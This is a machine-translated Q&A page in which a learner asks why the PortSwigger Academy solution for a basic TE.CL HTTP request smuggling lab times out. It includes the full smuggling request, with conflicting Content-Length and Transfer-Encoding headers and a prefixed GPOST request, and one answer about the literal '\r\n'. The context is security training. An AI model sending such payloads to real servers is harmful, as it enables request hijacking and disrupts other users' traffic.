HTTP请求走私,基本的TE.CL漏洞
HTTP请求走私,基本的TE.CL漏洞
提问于 2019-10-04 22:57:46
我试图了解有关http请求走私,我尝试实验室的打嗝套件。I卡在TE.CL漏洞上,我点击了解决方案(参见下面的:https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl),但请求只是超时。我禁用了“更新内容长度”,并用当前的实验室id更改了mylabid。还有我错过的另一个场景吗?
POST / HTTP/1.1
Host: mylabid.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0\r\n\r\n回答 1
Security用户
发布于 2019-10-11 04:45:29
“r\n”字。它就像图像,它是解释的,而不是书面的
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/219115
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号